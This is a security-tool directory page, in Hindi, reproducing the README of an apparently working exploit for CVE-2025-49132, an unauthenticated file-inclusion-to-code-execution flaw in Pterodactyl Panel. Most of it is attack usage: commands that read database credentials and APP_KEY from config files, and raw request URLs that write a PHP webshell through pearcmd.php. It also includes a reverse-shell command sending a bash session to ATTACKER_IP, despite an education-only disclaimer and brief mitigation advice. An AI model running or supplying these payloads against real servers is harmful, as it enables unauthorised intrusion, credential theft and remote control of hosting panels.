Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132 — CVE For Pterodactyl (अध्ययन और शिक्षा के लिए) | Kitploit
उपकरण/GitHubGitHub/popyue/cve-2025-49132
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubpopyue/cve-2025-49132

CVE-2025-49132

CVE For Pterodactyl (अध्ययन और शिक्षा के लिए)

रिपॉजिटरी देखें
4127 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49132 - Pterodactyl Panel एक्सप्लॉइट

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और शोध उद्देश्यों के लिए बनाई गई है, जो मेरी सुरक्षा अनुसंधान के भाग के रूप में CVE-2025-49132 को समझने और दस्तावेज करने के लिए है। भेद्यता की खोज का सारा श्रेय मूल शोधकर्ता(ओं) को जाता है।

  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Pterodactyl Panel - अप्रमाणित LFI से RCE तक एक्सप्लॉइट

📋 विवरण

CVE-2025-49132 Pterodactyl Panel में एक अप्रमाणित स्थानीय फ़ाइल समावेशन (LFI) भेद्यता है जिसे PHP के pearcmd.php के माध्यम से दूरस्थ कोड निष्पादन (RCE) में बढ़ाया जा सकता है।

भेद्यता /locales/locale.json एंडपॉइंट में मौजूद है, जो locale और namespace पैरामीटरों को ठीक से साफ़ करने में विफल रहता है, जिससे हमलावर मनमानी PHP कॉन्फ़िगरेशन फ़ाइलों को पढ़ सकते हैं और कोड निष्पादन प्राप्त कर सकते हैं।

🎯 प्रभावित संस्करण

स्थितिसंस्करण
❌ संवेदनशील<= 1.11.10
✅ पैच किया गया>= 1.11.11

⚡ विशेषताएँ

  • LFI मोड: PHP कॉन्फ़िगरेशन फ़ाइलें पढ़ें (डेटाबेस क्रेडेंशियल, APP_KEY, आदि)
  • RCE मोड: pearcmd.php LFI2RCE तकनीक के माध्यम से दूरस्थ कोड निष्पादन
  • इंटरैक्टिव शेल: कई कमांड निष्पादन के लिए स्थायी शेल
  • एकल कमांड: एक-शॉट कमांड निष्पादन
  • सुंदर आउटपुट: बेहतर पठनीयता के लिए रंग-कोडित, स्वरूपित आउटपुट

📦 स्थापना

# रिपॉजिटरी को क्लोन करें
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# निर्भरताएँ स्थापित करें
pip install requests

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी
  • curl (RCE मोड के लिए)

🚀 उपयोग

LFI - कॉन्फ़िगरेशन फ़ाइलें पढ़ें

# डेटाबेस कॉन्फ़िगरेशन पढ़ें
python exploit.py -u http://target.com --read -p ../../config -f database

# एप्लिकेशन कॉन्फ़िगरेशन पढ़ें (इसमें APP_KEY है)
python exploit.py -u http://target.com --read -p ../../config -f app

# अन्य कॉन्फ़िगरेशन पढ़ें
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail

RCE - दूरस्थ कोड निष्पादन

# एकल कमांड निष्पादन
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# इंटरैक्टिव शेल मोड
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# रिवर्स शेल
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

सामान्य PEAR पथ

वितरणपथ
Debian/Ubuntu../../../../../../usr/share/php
SUSE/OpenSUSE../../../../../../usr/share/php/PEAR
CentOS/RHEL../../../../../../usr/share/pear
Alpine../../../../../../usr/share/php8

📖 आर्गुमेंट्स

आर्गुमेंटविवरण
-u, --urlलक्ष्य URL (आवश्यक)
-p, --pathLFI के लिए पथ ट्रैवर्सल या RCE के लिए PEAR पथ
-f, --fileपढ़ने के लिए PHP फ़ाइल (बिना .php एक्सटेंशन के)
--readLFI रीड मोड सक्षम करें
--rceRCE मोड सक्षम करें
--cmdनिष्पादित करने के लिए कमांड (एकल निष्पादन मोड)
--sdirशेल लिखने के लिए निर्देशिका (डिफ़ॉल्ट: /tmp)
--snameशेल फ़ाइल नाम (डिफ़ॉल्ट: shell)

🔬 यह कैसे काम करता है

LFI (स्थानीय फ़ाइल समावेशन)

संवेदनशील एंडपॉइंट /locales/locale.json locale और namespace पैरामीटर स्वीकार करता है:

GET /locales/locale.json?locale=../../config&namespace=database

यह किसी भी PHP फ़ाइल को पढ़ने की अनुमति देता है जो एक सरणी लौटाती है, जिसमें Laravel कॉन्फ़िगरेशन फ़ाइलें शामिल हैं।

RCE (दूरस्थ कोड निष्पादन)

एक्सप्लॉइट RCE प्राप्त करने के लिए LFI को pearcmd.php के साथ जोड़ता है:

  1. चरण 1: PHP वेबशेल लिखने के लिए pearcmd.php के config-create कमांड का उपयोग करें

    /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system(...)?>+/tmp/shell.php
    
  2. चरण 2: LFI के माध्यम से लिखे गए शेल को शामिल करें

    /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=<hex_encoded_cmd>
    

📸 स्क्रीनशॉट

LFI - डेटाबेस कॉन्फ़िगरेशन पढ़ना

════════════════════════════════════════════════════════════
  डेटाबेस कॉन्फ़िगरेशन
════════════════════════════════════════════════════════════

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

────────────────────────────────────────────────────────────
[+] कॉन्फ़िगरेशन सफलतापूर्वक निकाला गया!

RCE - कमांड निष्पादन

[*] Target: http://panel.example.com
[*] Executing command: id
[*] Writing payload to: /tmp/cmd_abc123.php
[+] Output:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------

🛡️ शमन

  1. Pterodactyl Panel को 1.11.11 या बाद के संस्करण में अपडेट करें
  2. locale और namespace पैरामीटरों पर उचित इनपुट सत्यापन लागू करें
  3. मान्य locale/namespace मानों के लिए अनुमति सूची का उपयोग करें
  4. PHP के register_argc_argv निर्देश को प्रतिबंधित करें

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टमों तक अनधिकृत पहुँच अवैध है
  • इस उपकरण के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है

जिम्मेदारी और नैतिकता से उपयोग करें।

📚 संदर्भ

  • Pterodactyl Panel Official
  • Pterodactyl Panel Github
  • CVE-2025-49132 Details
  • CVE-2025-49132: Pterodactyl Panel Allows Unauthenticated Arbitrary Remote Code Execution
  • PEAR LFI to RCE Technique
  • PHP Filter Chain Generator
  • Local File Inclusion to Remote Code Execution (RCE)

📝 परिवर्तन-लॉग

  • v1.0.0 - प्रारंभिक रिलीज़
    • LFI कॉन्फ़िगरेशन पढ़ना
    • pearcmd के माध्यम से RCE
    • इंटरैक्टिव शेल मोड
    • सुंदर स्वरूपित आउटपुट

⭐ यदि आपको यह उपयोगी लगे तो इस रेपो को स्टार करें!

टूल डाउनलोड करें